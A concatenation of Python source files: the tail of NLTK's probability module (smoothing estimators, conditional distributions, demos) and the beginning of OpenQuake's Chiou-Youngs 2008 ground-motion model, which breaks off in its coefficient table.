for previously seen items (as Gale and Sampson (1995) propose). (See M&S P.213, 1999) """ prob_cov = 0.0 for r_, nr_ in zip(r, nr): prob_cov += nr_ * self._prob_measure(r_) if prob_cov: self._renormal = (1 - self._prob_measure(0)) / prob_cov def smoothedNr(self, r): """ Return the number of samples with count r. :param r: The amount of frequency. :type r: int :rtype: float """ # Nr = a*r^b (with b < -1 to give the appropriate hyperbolic # relationship) # Estimate a and b by simple linear regression technique on # the logarithmic form of the equation: log Nr = a + b*log(r) return math.exp(self._intercept + self._slope * math.log(r)) def prob(self, sample): """ Return the sample's probability. :param sample: sample of the event :type sample: str :rtype: float """ count = self._freqdist[sample] p = self._prob_measure(count) if count == 0: if self._bins == self._freqdist.B(): p = 0.0 else: p = p / (1.0 * self._bins - self._freqdist.B()) else: p = p * self._renormal return p def _prob_measure(self, count): if count == 0 and self._freqdist.N() == 0 : return 1.0 elif count == 0 and self._freqdist.N() != 0: return 1.0 * self._freqdist.Nr(1) / self._freqdist.N() if self._switch_at > count: Er_1 = 1.0 * self._freqdist.Nr(count+1) Er = 1.0 * self._freqdist.Nr(count) else: Er_1 = self.smoothedNr(count+1) Er = self.smoothedNr(count) r_star = (count + 1) * Er_1 / Er return r_star / self._freqdist.N() def check(self): prob_sum = 0.0 for i in range(0, len(self._Nr)): prob_sum += self._Nr[i] * self._prob_measure(i) / self._renormal print("Probability Sum:", prob_sum) #assert prob_sum != 1.0, "probability sum should be one!" def discount(self): """ This function returns the total mass of probability transfers from the seen samples to the unseen samples. """ return 1.0 * self.smoothedNr(1) / self._freqdist.N() def max(self): return self._freqdist.max() def samples(self): return self._freqdist.keys() def freqdist(self): return self._freqdist def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<SimpleGoodTuringProbDist based on %d samples>'\ % self._freqdist.N() class MutableProbDist(ProbDistI): """ An mutable probdist where the probabilities may be easily modified. This simply copies an existing probdist, storing the probability values in a mutable dictionary and providing an update method. """ def __init__(self, prob_dist, samples, store_logs=True): """ Creates the mutable probdist based on the given prob_dist and using the list of samples given. These values are stored as log probabilities if the store_logs flag is set. :param prob_dist: the distribution from which to garner the probabilities :type prob_dist: ProbDist :param samples: the complete set of samples :type samples: sequence of any :param store_logs: whether to store the probabilities as logarithms :type store_logs: bool """ self._samples = samples self._sample_dict = dict((samples[i], i) for i in range(len(samples))) self._data = array.array(str("d"), [0.0]) * len(samples) for i in range(len(samples)): if store_logs: self._data[i] = prob_dist.logprob(samples[i]) else: self._data[i] = prob_dist.prob(samples[i]) self._logs = store_logs def samples(self): # inherit documentation return self._samples def prob(self, sample): # inherit documentation i = self._sample_dict.get(sample) if i is None: return 0.0 return (2**(self._data[i]) if self._logs else self._data[i]) def logprob(self, sample): # inherit documentation i = self._sample_dict.get(sample) if i is None: return float('-inf') return (self._data[i] if self._logs else math.log(self._data[i], 2)) def update(self, sample, prob, log=True): """ Update the probability for the given sample. This may cause the object to stop being the valid probability distribution - the user must ensure that they update the sample probabilities such that all samples have probabilities between 0 and 1 and that all probabilities sum to one. :param sample: the sample for which to update the probability :type sample: any :param prob: the new probability :type prob: float :param log: is the probability already logged :type log: bool """ i = self._sample_dict.get(sample) assert i is not None if self._logs: self._data[i] = (prob if log else math.log(prob, 2)) else: self._data[i] = (2**(prob) if log else prob) ##///////////////////////////////////////////////////// ## Kneser-Ney Probability Distribution ##////////////////////////////////////////////////////// # This method for calculating probabilities was introduced in 1995 by Reinhard # Kneser and Hermann Ney. It was meant to improve the accuracy of language # models that use backing-off to deal with sparse data. The authors propose two # ways of doing so: a marginal distribution constraint on the back-off # distribution and a leave-one-out distribution. For a start, the first one is # implemented as a class below. # # The idea behind a back-off n-gram model is that we have a series of # frequency distributions for our n-grams so that in case we have not seen a # given n-gram during training (and as a result have a 0 probability for it) we # can 'back off' (hence the name!) and try testing whether we've seen the # n-1-gram part of the n-gram in training. # # The novelty of Kneser and Ney's approach was that they decided to fiddle # around with the way this latter, backed off probability was being calculated # whereas their peers seemed to focus on the primary probability. # # The implementation below uses one of the techniques described in their paper # titled "Improved backing-off for n-gram language modeling." In the same paper # another technique is introduced to attempt to smooth the back-off # distribution as well as the primary one. There is also a much-cited # modification of this method proposed by Chen and Goodman. # # In order for the implementation of Kneser-Ney to be more efficient, some # changes have been made to the original algorithm. Namely, the calculation of # the normalizing function gamma has been significantly simplified and # combined slightly differently with beta. None of these changes affect the # nature of the algorithm, but instead aim to cut out unnecessary calculations # and take advantage of storing and retrieving information in dictionaries # where possible. @compat.python_2_unicode_compatible class KneserNeyProbDist(ProbDistI): """ Kneser-Ney estimate of a probability distribution. This is a version of back-off that counts how likely an n-gram is provided the n-1-gram had been seen in training. Extends the ProbDistI interface, requires a trigram FreqDist instance to train on. Optionally, a different from default discount value can be specified. The default discount is set to 0.75. """ def __init__(self, freqdist, bins=None, discount=0.75): """ :param freqdist: The trigram frequency distribution upon which to base the estimation :type freqdist: FreqDist :param bins: Included for compatibility with nltk.tag.hmm :type bins: int or float :param discount: The discount applied when retrieving counts of trigrams :type discount: float (preferred, but can be set to int) """ if not bins: self._bins = freqdist.B() else: self._bins = bins self._D = discount # cache for probability calculation self._cache = {} # internal bigram and trigram frequency distributions self._bigrams = defaultdict(int) self._trigrams = freqdist # helper dictionaries used to calculate probabilities self._wordtypes_after = defaultdict(float) self._trigrams_contain = defaultdict(float) self._wordtypes_before = defaultdict(float) for w0, w1, w2 in freqdist: self._bigrams[(w0,w1)] += freqdist[(w0, w1, w2)] self._wordtypes_after[(w0,w1)] += 1 self._trigrams_contain[w1] += 1 self._wordtypes_before[(w1,w2)] += 1 def prob(self, trigram): # sample must be a triple if len(trigram) != 3: raise ValueError('Expected an iterable with 3 members.') trigram = tuple(trigram) w0, w1, w2 = trigram if trigram in self._cache: return self._cache[trigram] else: # if the sample trigram was seen during training if trigram in self._trigrams: prob = (self._trigrams[trigram] - self.discount())/self._bigrams[(w0, w1)] # else if the 'rougher' environment was seen during training elif (w0,w1) in self._bigrams and (w1,w2) in self._wordtypes_before: aftr = self._wordtypes_after[(w0, w1)] bfr = self._wordtypes_before[(w1, w2)] # the probability left over from alphas leftover_prob = ((aftr * self.discount()) / self._bigrams[(w0, w1)]) # the beta (including normalization) beta = bfr /(self._trigrams_contain[w1] - aftr) prob = leftover_prob * beta # else the sample was completely unseen during training else: prob = 0.0 self._cache[trigram] = prob return prob def discount(self): """ Return the value by which counts are discounted. By default set to 0.75. :rtype: float """ return self._D def set_discount(self, discount): """ Set the value by which counts are discounted to the value of discount. :param discount: the new value to discount counts by :type discount: float (preferred, but int possible) :rtype: None """ self._D = discount def samples(self): return self._trigrams.keys() def max(self): return self._trigrams.max() def __repr__(self): ''' Return a string representation of this ProbDist :rtype: str ''' return '<KneserNeyProbDist based on {0} trigrams'.format(self._trigrams.N()) ##////////////////////////////////////////////////////// ## Probability Distribution Operations ##////////////////////////////////////////////////////// def log_likelihood(test_pdist, actual_pdist): if (not isinstance(test_pdist, ProbDistI) or not isinstance(actual_pdist, ProbDistI)): raise ValueError('expected a ProbDist.') # Is this right? return sum(actual_pdist.prob(s) * math.log(test_pdist.prob(s), 2) for s in actual_pdist) def entropy(pdist): probs = (pdist.prob(s) for s in pdist.samples()) return -sum(p * math.log(p,2) for p in probs) ##////////////////////////////////////////////////////// ## Conditional Distributions ##////////////////////////////////////////////////////// @compat.python_2_unicode_compatible class ConditionalFreqDist(defaultdict): """ A collection of frequency distributions for a single experiment run under different conditions. Conditional frequency distributions are used to record the number of times each sample occurred, given the condition under which the experiment was run. For example, a conditional frequency distribution could be used to record the frequency of each word (type) in a document, given its length. Formally, a conditional frequency distribution can be defined as a function that maps from each condition to the FreqDist for the experiment under that condition. Conditional frequency distributions are typically constructed by repeatedly running an experiment under a variety of conditions, and incrementing the sample outcome counts for the appropriate conditions. For example, the following code will produce a conditional frequency distribution that encodes how often each word type occurs, given the length of that word type: >>> from nltk.probability import ConditionalFreqDist >>> from nltk.tokenize import word_tokenize >>> sent = "the the the dog dog some other words that we do not care about" >>> cfdist = ConditionalFreqDist() >>> for word in word_tokenize(sent): ... condition = len(word) ... cfdist[condition][word] += 1 An equivalent way to do this is with the initializer: >>> cfdist = ConditionalFreqDist((len(word), word) for word in word_tokenize(sent)) The frequency distribution for each condition is accessed using the indexing operator: >>> cfdist[3] FreqDist({'the': 3, 'dog': 2, 'not': 1}) >>> cfdist[3].freq('the') 0.5 >>> cfdist[3]['dog'] 2 When the indexing operator is used to access the frequency distribution for a condition that has not been accessed before, ``ConditionalFreqDist`` creates a new empty FreqDist for that condition. """ def __init__(self, cond_samples=None): """ Construct a new empty conditional frequency distribution. In particular, the count for every sample, under every condition, is zero. :param cond_samples: The samples to initialize the conditional frequency distribution with :type cond_samples: Sequence of (condition, sample) tuples """ defaultdict.__init__(self, FreqDist) if cond_samples: for (cond, sample) in cond_samples: self[cond][sample] += 1 def __reduce__(self): kv_pairs = ((cond, self[cond]) for cond in self.conditions()) return (self.__class__, (), None, None, kv_pairs) def conditions(self): """ Return a list of the conditions that have been accessed for this ``ConditionalFreqDist``. Use the indexing operator to access the frequency distribution for a given condition. Note that the frequency distributions for some conditions may contain zero sample outcomes. :rtype: list """ return list(self.keys()) def N(self): """ Return the total number of sample outcomes that have been recorded by this ``ConditionalFreqDist``. :rtype: int """ return sum(fdist.N() for fdist in compat.itervalues(self)) def plot(self, *args, **kwargs): """ Plot the given samples from the conditional frequency distribution. For a cumulative plot, specify cumulative=True. (Requires Matplotlib to be installed.) :param samples: The samples to plot :type samples: list :param title: The title for the graph :type title: str :param conditions: The conditions to plot (default is all) :type conditions: list """ try: from matplotlib import pylab except ImportError: raise ValueError('The plot function requires matplotlib to be installed.' 'See http://matplotlib.org/') cumulative = _get_kwarg(kwargs, 'cumulative', False) conditions = _get_kwarg(kwargs, 'conditions', sorted(self.conditions())) title = _get_kwarg(kwargs, 'title', '') samples = _get_kwarg(kwargs, 'samples', sorted(set(v for c in conditions for v in self[c]))) # this computation could be wasted if not "linewidth" in kwargs: kwargs["linewidth"] = 2 for condition in conditions: if cumulative: freqs = list(self[condition]._cumulative_frequencies(samples)) ylabel = "Cumulative Counts" legend_loc = 'lower right' else: freqs = [self[condition][sample] for sample in samples] ylabel = "Counts" legend_loc = 'upper right' # percents = [f * 100 for f in freqs] only in ConditionalProbDist? kwargs['label'] = "%s" % condition pylab.plot(freqs, *args, **kwargs) pylab.legend(loc=legend_loc) pylab.grid(True, color="silver") pylab.xticks(range(len(samples)), [compat.text_type(s) for s in samples], rotation=90) if title: pylab.title(title) pylab.xlabel("Samples") pylab.ylabel(ylabel) pylab.show() def tabulate(self, *args, **kwargs): """ Tabulate the given samples from the conditional frequency distribution. :param samples: The samples to plot :type samples: list :param title: The title for the graph :type title: str :param conditions: The conditions to plot (default is all) :type conditions: list """ cumulative = _get_kwarg(kwargs, 'cumulative', False) conditions = _get_kwarg(kwargs, 'conditions', sorted(self.conditions())) samples = _get_kwarg(kwargs, 'samples', sorted(set(v for c in conditions for v in self[c]))) # this computation could be wasted condition_size = max(len("%s" % c) for c in conditions) print(' ' * condition_size, end=' ') for s in samples: print("%4s" % s, end=' ') print() for c in conditions: print("%*s" % (condition_size, c), end=' ') if cumulative: freqs = list(self[c]._cumulative_frequencies(samples)) else: freqs = [self[c][sample] for sample in samples] for f in freqs: print("%4d" % f, end=' ') print() # @total_ordering doesn't work here, since the class inherits from a builtin class def __le__(self, other): if not isinstance(other, ConditionalFreqDist): raise_unorderable_types("<=", self, other) return set(self.conditions()).issubset(other.conditions()) \ and all(self[c] <= other[c] for c in self.conditions()) def __lt__(self, other): if not isinstance(other, ConditionalFreqDist): raise_unorderable_types("<", self, other) return self <= other and self != other def __ge__(self, other): if not isinstance(other, ConditionalFreqDist): raise_unorderable_types(">=", self, other) return other <= self def __gt__(self, other): if not isinstance(other, ConditionalFreqDist): raise_unorderable_types(">", self, other) return other < self def __repr__(self): """ Return a string representation of this ``ConditionalFreqDist``. :rtype: str """ return '<ConditionalFreqDist with %d conditions>' % len(self) @compat.python_2_unicode_compatible class ConditionalProbDistI(dict): """ A collection of probability distributions for a single experiment run under different conditions. Conditional probability distributions are used to estimate the likelihood of each sample, given the condition under which the experiment was run. For example, a conditional probability distribution could be used to estimate the probability of each word type in a document, given the length of the word type. Formally, a conditional probability distribution can be defined as a function that maps from each condition to the ``ProbDist`` for the experiment under that condition. """ def __init__(self): raise NotImplementedError("Interfaces can't be instantiated") def conditions(self): """ Return a list of the conditions that are represented by this ``ConditionalProbDist``. Use the indexing operator to access the probability distribution for a given condition. :rtype: list """ return list(self.keys()) def __repr__(self): """ Return a string representation of this ``ConditionalProbDist``. :rtype: str """ return '<%s with %d conditions>' % (type(self).__name__, len(self)) class ConditionalProbDist(ConditionalProbDistI): """ A conditional probability distribution modeling the experiments that were used to generate a conditional frequency distribution. A ConditionalProbDist is constructed from a ``ConditionalFreqDist`` and a ``ProbDist`` factory: - The ``ConditionalFreqDist`` specifies the frequency distribution for each condition. - The ``ProbDist`` factory is a function that takes a condition's frequency distribution, and returns its probability distribution. A ``ProbDist`` class's name (such as ``MLEProbDist`` or ``HeldoutProbDist``) can be used to specify that class's constructor. The first argument to the ``ProbDist`` factory is the frequency distribution that it should model; and the remaining arguments are specified by the ``factory_args`` parameter to the ``ConditionalProbDist`` constructor. For example, the following code constructs a ``ConditionalProbDist``, where the probability distribution for each condition is an ``ELEProbDist`` with 10 bins: >>> from nltk.corpus import brown >>> from nltk.probability import ConditionalFreqDist >>> from nltk.probability import ConditionalProbDist, ELEProbDist >>> cfdist = ConditionalFreqDist(brown.tagged_words()[:5000]) >>> cpdist = ConditionalProbDist(cfdist, ELEProbDist, 10) >>> cpdist['passed'].max() 'VBD' >>> cpdist['passed'].prob('VBD') 0.423... """ def __init__(self, cfdist, probdist_factory, *factory_args, **factory_kw_args): """ Construct a new conditional probability distribution, based on the given conditional frequency distribution and ``ProbDist`` factory. :type cfdist: ConditionalFreqDist :param cfdist: The ``ConditionalFreqDist`` specifying the frequency distribution for each condition. :type probdist_factory: class or function :param probdist_factory: The function or class that maps a condition's frequency distribution to its probability distribution. The function is called with the frequency distribution as its first argument, ``factory_args`` as its remaining arguments, and ``factory_kw_args`` as keyword arguments. :type factory_args: (any) :param factory_args: Extra arguments for ``probdist_factory``. These arguments are usually used to specify extra properties for the probability distributions of individual conditions, such as the number of bins they contain. :type factory_kw_args: (any) :param factory_kw_args: Extra keyword arguments for ``probdist_factory``. """ self._probdist_factory = probdist_factory self._factory_args = factory_args self._factory_kw_args = factory_kw_args for condition in cfdist: self[condition] = probdist_factory(cfdist[condition], *factory_args, **factory_kw_args) def __missing__(self, key): self[key] = self._probdist_factory(FreqDist(), *self._factory_args, **self._factory_kw_args) return self[key] class DictionaryConditionalProbDist(ConditionalProbDistI): """ An alternative ConditionalProbDist that simply wraps a dictionary of ProbDists rather than creating these from FreqDists. """ def __init__(self, probdist_dict): """ :param probdist_dict: a dictionary containing the probdists indexed by the conditions :type probdist_dict: dict any -> probdist """ self.update(probdist_dict) def __missing__(self, key): self[key] = DictionaryProbDist() return self[key] ##////////////////////////////////////////////////////// ## Adding in log-space. ##////////////////////////////////////////////////////// # If the difference is bigger than this, then just take the bigger one: _ADD_LOGS_MAX_DIFF = math.log(1e-30, 2) def add_logs(logx, logy): """ Given two numbers ``logx`` = *log(x)* and ``logy`` = *log(y)*, return *log(x+y)*. Conceptually, this is the same as returning ``log(2**(logx)+2**(logy))``, but the actual implementation avoids overflow errors that could result from direct computation. """ if (logx < logy + _ADD_LOGS_MAX_DIFF): return logy if (logy < logx + _ADD_LOGS_MAX_DIFF): return logx base = min(logx, logy) return base + math.log(2**(logx-base) + 2**(logy-base), 2) def sum_logs(logs): return (reduce(add_logs, logs[1:], logs[0]) if len(logs) != 0 else _NINF) ##////////////////////////////////////////////////////// ## Probabilistic Mix-in ##////////////////////////////////////////////////////// class ProbabilisticMixIn(object): """ A mix-in class to associate probabilities with other classes (trees, rules, etc.). To use the ``ProbabilisticMixIn`` class, define a new class that derives from an existing class and from ProbabilisticMixIn. You will need to define a new constructor for the new class, which explicitly calls the constructors of both its parent classes. For example: >>> from nltk.probability import ProbabilisticMixIn >>> class A: ... def __init__(self, x, y): self.data = (x,y) ... >>> class ProbabilisticA(A, ProbabilisticMixIn): ... def __init__(self, x, y, **prob_kwarg): ... A.__init__(self, x, y) ... ProbabilisticMixIn.__init__(self, **prob_kwarg) See the documentation for the ProbabilisticMixIn ``constructor<__init__>`` for information about the arguments it expects. You should generally also redefine the string representation methods, the comparison methods, and the hashing method. """ def __init__(self, **kwargs): """ Initialize this object's probability. This initializer should be called by subclass constructors. ``prob`` should generally be the first argument for those constructors. :param prob: The probability associated with the object. :type prob: float :param logprob: The log of the probability associated with the object. :type logprob: float """ if 'prob' in kwargs: if 'logprob' in kwargs: raise TypeError('Must specify either prob or logprob ' '(not both)') else: ProbabilisticMixIn.set_prob(self, kwargs['prob']) elif 'logprob' in kwargs: ProbabilisticMixIn.set_logprob(self, kwargs['logprob']) else: self.__prob = self.__logprob = None def set_prob(self, prob): """ Set the probability associated with this object to ``prob``. :param prob: The new probability :type prob: float """ self.__prob = prob self.__logprob = None def set_logprob(self, logprob): """ Set the log probability associated with this object to ``logprob``. I.e., set the probability associated with this object to ``2**(logprob)``. :param logprob: The new log probability :type logprob: float """ self.__logprob = logprob self.__prob = None def prob(self): """ Return the probability associated with this object. :rtype: float """ if self.__prob is None: if self.__logprob is None: return None self.__prob = 2**(self.__logprob) return self.__prob def logprob(self): """ Return ``log(p)``, where ``p`` is the probability associated with this object. :rtype: float """ if self.__logprob is None: if self.__prob is None: return None self.__logprob = math.log(self.__prob, 2) return self.__logprob class ImmutableProbabilisticMixIn(ProbabilisticMixIn): def set_prob(self, prob): raise ValueError('%s is immutable' % self.__class__.__name__) def set_logprob(self, prob): raise ValueError('%s is immutable' % self.__class__.__name__) ## Helper function for processing keyword arguments def _get_kwarg(kwargs, key, default): if key in kwargs: arg = kwargs[key] del kwargs[key] else: arg = default return arg ##////////////////////////////////////////////////////// ## Demonstration ##////////////////////////////////////////////////////// def _create_rand_fdist(numsamples, numoutcomes): """ Create a new frequency distribution, with random samples. The samples are numbers from 1 to ``numsamples``, and are generated by summing two numbers, each of which has a uniform distribution. """ import random fdist = FreqDist() for x in range(numoutcomes): y = (random.randint(1, (1 + numsamples) // 2) + random.randint(0, numsamples // 2)) fdist[y] += 1 return fdist def _create_sum_pdist(numsamples): """ Return the true probability distribution for the experiment ``_create_rand_fdist(numsamples, x)``. """ fdist = FreqDist() for x in range(1, (1 + numsamples) // 2 + 1): for y in range(0, numsamples // 2 + 1): fdist[x+y] += 1 return MLEProbDist(fdist) def demo(numsamples=6, numoutcomes=500): """ A demonstration of frequency distributions and probability distributions. This demonstration creates three frequency distributions with, and uses them to sample a random process with ``numsamples`` samples. Each frequency distribution is sampled ``numoutcomes`` times. These three frequency distributions are then used to build six probability distributions. Finally, the probability estimates of these distributions are compared to the actual probability of each sample. :type numsamples: int :param numsamples: The number of samples to use in each demo frequency distributions. :type numoutcomes: int :param numoutcomes: The total number of outcomes for each demo frequency distribution. These outcomes are divided into ``numsamples`` bins. :rtype: None """ # Randomly sample a stochastic process three times. fdist1 = _create_rand_fdist(numsamples, numoutcomes) fdist2 = _create_rand_fdist(numsamples, numoutcomes) fdist3 = _create_rand_fdist(numsamples, numoutcomes) # Use our samples to create probability distributions. pdists = [ MLEProbDist(fdist1), LidstoneProbDist(fdist1, 0.5, numsamples), HeldoutProbDist(fdist1, fdist2, numsamples), HeldoutProbDist(fdist2, fdist1, numsamples), CrossValidationProbDist([fdist1, fdist2, fdist3], numsamples), SimpleGoodTuringProbDist(fdist1), SimpleGoodTuringProbDist(fdist1, 7), _create_sum_pdist(numsamples), ] # Find the probability of each sample. vals = [] for n in range(1,numsamples+1): vals.append(tuple([n, fdist1.freq(n)] + [pdist.prob(n) for pdist in pdists])) # Print the results in a formatted table. print(('%d samples (1-%d); %d outcomes were sampled for each FreqDist' % (numsamples, numsamples, numoutcomes))) print('='*9*(len(pdists)+2)) FORMATSTR = ' FreqDist '+ '%8s '*(len(pdists)-1) + '| Actual' print(FORMATSTR % tuple(repr(pdist)[1:9] for pdist in pdists[:-1])) print('-'*9*(len(pdists)+2)) FORMATSTR = '%3d %8.6f ' + '%8.6f '*(len(pdists)-1) + '| %8.6f' for val in vals: print(FORMATSTR % val) # Print the totals for each column (should all be 1.0) zvals = list(zip(*vals)) sums = [sum(val) for val in zvals[1:]] print('-'*9*(len(pdists)+2)) FORMATSTR = 'Total ' + '%8.6f '*(len(pdists)) + '| %8.6f' print(FORMATSTR % tuple(sums)) print('='*9*(len(pdists)+2)) # Display the distributions themselves, if they're short enough. if len("%s" % fdist1) < 70: print(' fdist1: %s' % fdist1) print(' fdist2: %s' % fdist2) print(' fdist3: %s' % fdist3) print() print('Generating:') for pdist in pdists: fdist = FreqDist(pdist.generate() for i in range(5000)) print('%20s %s' % (pdist.__class__.__name__[:20], ("%s" % fdist)[:55])) print() def gt_demo(): from nltk import corpus emma_words = corpus.gutenberg.words('austen-emma.txt') fd = FreqDist(emma_words) sgt = SimpleGoodTuringProbDist(fd) print('%18s %8s %14s' \ % ("word", "freqency", "SimpleGoodTuring")) fd_keys_sorted=(key for key, value in sorted(fd.items(), key=lambda item: item[1], reverse=True)) for key in fd_keys_sorted: print('%18s %8d %14e' \ % (key, fd[key], sgt.prob(key))) if __name__ == '__main__': demo(6, 10) demo(5, 5000) gt_demo() __all__ = ['ConditionalFreqDist', 'ConditionalProbDist', 'ConditionalProbDistI', 'CrossValidationProbDist', 'DictionaryConditionalProbDist', 'DictionaryProbDist', 'ELEProbDist', 'FreqDist', 'SimpleGoodTuringProbDist', 'HeldoutProbDist', 'ImmutableProbabilisticMixIn', 'LaplaceProbDist', 'LidstoneProbDist', 'MLEProbDist', 'MutableProbDist', 'KneserNeyProbDist', 'ProbDistI', 'ProbabilisticMixIn', 'UniformProbDist', 'WittenBellProbDist', 'add_logs', 'log_likelihood', 'sum_logs', 'entropy']
Reagankm/KnockKnock
venv/lib/python3.4/site-packages/nltk/probability.py
Python
gpl-2.0
83,570
# The Hazard Library # Copyright (C) 2012 GEM Foundation # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ Module exports :class:`ChiouYoungs2008`. """ from __future__ import division import numpy as np from openquake.hazardlib.gsim.base import GMPE, CoeffsTable from openquake.hazardlib import const from openquake.hazardlib.imt import PGA, PGV, SA class ChiouYoungs2008(GMPE): """ Implements GMPE developed by Brian S.-J. Chiou and Robert R. Youngs and published as "An NGA Model for the Average Horizontal Component of Peak Ground Motion and Response Spectra" (2008, Earthquake Spectra, Volume 24, No. 1, pages 173-215). """ #: Supported tectonic region type is active shallow crust, see page 174. DEFINED_FOR_TECTONIC_REGION_TYPE = const.TRT.ACTIVE_SHALLOW_CRUST #: Supported intensity measure types are spectral acceleration, #: peak ground velocity and peak ground acceleration, see tables #: at pages 198 and 199. DEFINED_FOR_INTENSITY_MEASURE_TYPES = set([ PGA, PGV, SA ]) #: Supported intensity measure component is orientation-independent #: measure :attr:`~openquake.hazardlib.const.IMC.GMRotI50`, see page 174. DEFINED_FOR_INTENSITY_MEASURE_COMPONENT = const.IMC.GMRotI50 #: Supported standard deviation types are inter-event, intra-event #: and total, see chapter "Variance model". DEFINED_FOR_STANDARD_DEVIATION_TYPES = set([ const.StdDev.TOTAL, const.StdDev.INTER_EVENT, const.StdDev.INTRA_EVENT ]) #: Required site parameters are Vs30 (eq. 13b), Vs30 measured flag (eq. 20) #: and Z1.0 (eq. 13b). REQUIRES_SITES_PARAMETERS = set(('vs30', 'vs30measured', 'z1pt0')) #: Required rupture parameters are magnitude, rake (eq. 13a and 13b), #: dip (eq. 13a) and ztor (eq. 13a). REQUIRES_RUPTURE_PARAMETERS = set(('dip', 'rake', 'mag', 'ztor')) #: Required distance measures are RRup, Rjb and Rx (all are in eq. 13a). REQUIRES_DISTANCES = set(('rrup', 'rjb', 'rx')) def get_mean_and_stddevs(self, sites, rup, dists, imt, stddev_types): """ See :meth:`superclass method <.base.GroundShakingIntensityModel.get_mean_and_stddevs>` for spec of input and result values. """ # extracting dictionary of coefficients specific to required # intensity measure type. C = self.COEFFS[imt] # intensity on a reference soil is used for both mean # and stddev calculations. ln_y_ref = self._get_ln_y_ref(rup, dists, C) # exp1 and exp2 are parts of eq. 10 and eq. 13b, # calculate it once for both. exp1 = np.exp(C['phi3'] * (sites.vs30.clip(-np.inf, 1130) - 360)) exp2 = np.exp(C['phi3'] * (1130 - 360)) mean = self._get_mean(sites, C, ln_y_ref, exp1, exp2) stddevs = self._get_stddevs(sites, rup, C, stddev_types, ln_y_ref, exp1, exp2) return mean, stddevs def _get_mean(self, sites, C, ln_y_ref, exp1, exp2): """ Add site effects to an intensity. Implements eq. 13b. """ # we do not support estimating of basin depth and instead # rely on it being available (since we require it). z1pt0 = sites.z1pt0 # we consider random variables being zero since we want # to find the exact mean value. eta = epsilon = 0 ln_y = ( # first line of eq. 13b ln_y_ref + C['phi1'] * np.log(sites.vs30 / 1130).clip(-np.inf, 0) # second line + C['phi2'] * (exp1 - exp2) * np.log((np.exp(ln_y_ref) + C['phi4']) / C['phi4']) # third line + C['phi5'] * (1.0 - 1.0 / np.cosh( C['phi6'] * (z1pt0 - C['phi7']).clip(0, np.inf))) + C['phi8'] / np.cosh(0.15 * (z1pt0 - 15).clip(0, np.inf)) # fourth line + eta + epsilon ) return ln_y def _get_stddevs(self, sites, rup, C, stddev_types, ln_y_ref, exp1, exp2): """ Get standard deviation for a given intensity on reference soil. Implements equations 19, 20 and 21 for inter-event, intra-event and total standard deviations respectively. """ # aftershock flag is zero, we consider only main shock. AS = 0 Fmeasured = sites.vs30measured Finferred = 1 - sites.vs30measured # eq. 19 to calculate inter-event standard error mag_test = min(max(rup.mag, 5.0), 7.0) - 5.0 tau = C['tau1'] + (C['tau2'] - C['tau1']) / 2 * mag_test # b and c coeffs from eq. 10 b = C['phi2'] * (exp1 - exp2) c = C['phi4'] y_ref = np.exp(ln_y_ref) # eq. 20 NL = b * y_ref / (y_ref + c) sigma = ( # first line of eq. 20 (C['sig1'] + 0.5 * (C['sig2'] - C['sig1']) * mag_test + C['sig4'] * AS) # second line * np.sqrt((C['sig3'] * Finferred + 0.7 * Fmeasured) + (1 + NL) ** 2) ) ret = [] for stddev_type in stddev_types: assert stddev_type in self.DEFINED_FOR_STANDARD_DEVIATION_TYPES if stddev_type == const.StdDev.TOTAL: # eq. 21 ret += [np.sqrt(((1 + NL) ** 2) * (tau ** 2) + (sigma ** 2))] elif stddev_type == const.StdDev.INTRA_EVENT: ret.append(sigma) elif stddev_type == const.StdDev.INTER_EVENT: # this is implied in eq. 21 ret.append(np.abs((1 + NL) * tau)) return ret def _get_ln_y_ref(self, rup, dists, C): """ Get an intensity on a reference soil. Implements eq. 13a. """ # reverse faulting flag Frv = 1 if 30 <= rup.rake <= 150 else 0 # normal faulting flag Fnm = 1 if -120 <= rup.rake <= -60 else 0 # hanging wall flag Fhw = (dists.rx >= 0) # aftershock flag. always zero since we only consider main shock AS = 0 ln_y_ref = ( # first line of eq. 13a C['c1'] + (C['c1a'] * Frv + C['c1b'] * Fnm + C['c7'] * (rup.ztor - 4)) * (1 - AS) + (C['c10'] + C['c7a'] * (rup.ztor - 4)) * AS # second line + C['c2'] * (rup.mag - 6) + ((C['c2'] - C['c3']) / C['cn']) * np.log(1 + np.exp(C['cn'] * (C['cm'] - rup.mag))) # third line + C['c4'] * np.log(dists.rrup + C['c5'] * np.cosh(C['c6'] * max(rup.mag - C['chm'], 0))) # fourth line + (C['c4a'] - C['c4']) * np.log(np.sqrt(dists.rrup ** 2 + C['crb'] ** 2)) # fifth line + (C['cg1'] + C['cg2'] / (np.cosh(max(rup.mag - C['cg3'], 0)))) * dists.rrup # sixth line + C['c9'] * Fhw * np.tanh(dists.rx * (np.cos(np.radians(rup.dip)) ** 2) / C['c9a']) * (1 - np.sqrt(dists.rjb ** 2 + rup.ztor ** 2) / (dists.rrup + 0.001)) ) return ln_y_ref #: Coefficient tables are constructed from values in tables 1, 2 and 3 #: (pages 197, 198 and 199). Spectral acceleration is defined for damping #: of 5%, see page 208. COEFFS = CoeffsTable(sa_damping=5, table="""\ IMT c2 c3 c4 c4a crb chm cg3 c1 c1a c1b cn cm c5 c6 c7 c7a c9 c9a c10 cg1 cg2 phi1 phi2 phi3 phi4 phi5 phi6 phi7 phi8 tau1 tau2 sig1 sig2 sig3 sig4 pga 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 -1.2687 0.1000 -0.2550 2.996 4.1840 6.1600 0.4893 0.0512 0.0860 0.7900 1.5005 -0.3218 -0.00804 -0.00785 -0.4417 -0.1417 -0.007010 0.102151 0.2289 0.014996 580.0 0.0700 0.3437 0.2637 0.4458 0.3459 0.8000 0.0663 pgv 1.06 3.45 -2.1 -0.5 50.0 3.0 4.0 2.2884 0.1094 -0.0626 1.648 4.2979 5.1700 0.4407 0.0207 0.0437 0.3079 2.6690 -0.1166 -0.00275 -0.00625 -0.7861 -0.0699 -0.008444 5.410000 0.2899 0.006718 459.0 0.1138 0.2539 0.2381 0.4496 0.3554 0.7504 0.0133 0.010 1.06 3.45 -2.1 -0.5 50.0 3.0 